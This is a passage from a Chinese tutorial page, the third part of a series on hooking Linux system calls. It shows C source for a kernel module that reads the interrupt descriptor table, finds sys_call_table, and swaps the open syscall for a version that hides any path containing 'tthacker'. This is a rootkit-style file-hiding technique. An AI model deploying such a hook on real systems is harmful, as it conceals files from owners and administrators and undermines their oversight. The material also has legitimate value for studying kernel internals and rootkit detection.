设为首页 加入收藏

TOP

Linux内核Hook系统调用(三)
2014-11-24 03:24:54 来源: 作者: 【 】 浏览:2
Tags:Linux 内核 Hook 系统 调用

printk(KERN_ALERT "can't find the address of sys_call_table\n");
return -1;
}
int hacked_open(const char *pathname,int flag,mode_t mode)
{
// char *kernel_pathname;


char *hide="tthacker";
// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);


// memcpy_fromfs(kernel_pathname,pathname,999);


if(strstr(pathname,hide)!=NULL){
printk(KERN_ALERT "find name.\n");
return -ENOENT;
}
else{
// kfree(kernel_pathname);


return orig_open(pathname,flag,mode);
}
}
int init_module(void)
{
__asm__ volatile ("sidt %0": "=m" (idt48));
struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);
base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);
printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);
SYS_CALL_TABLE_ADDR=get_sys_call_table();
sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
orig_open=sys_call_table[__NR_open];
sys_call_table[__NR_open]=hacked_open;
return 0;
}
void cleanup_module()
{
sys_call_table[__NR_open]=orig_open;
}


首页 上一页 1 2 3 4 下一页 尾页 3/4/4
】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论】 【关闭】 【返回顶部
分享到: 
上一篇通用编程语言 Gosu 下一篇Linux高级内核Inline HOOK

评论

帐  号: 密码: (新用户注册)
验 证 码:
表  情:
内  容:

·常用meta整理 | 菜鸟 (2025-12-25 01:21:52)
·SQL HAVING 子句:深 (2025-12-25 01:21:47)
·SQL CREATE INDEX 语 (2025-12-25 01:21:45)
·Shell 传递参数 (2025-12-25 00:50:45)
·Linux echo 命令 - (2025-12-25 00:50:43)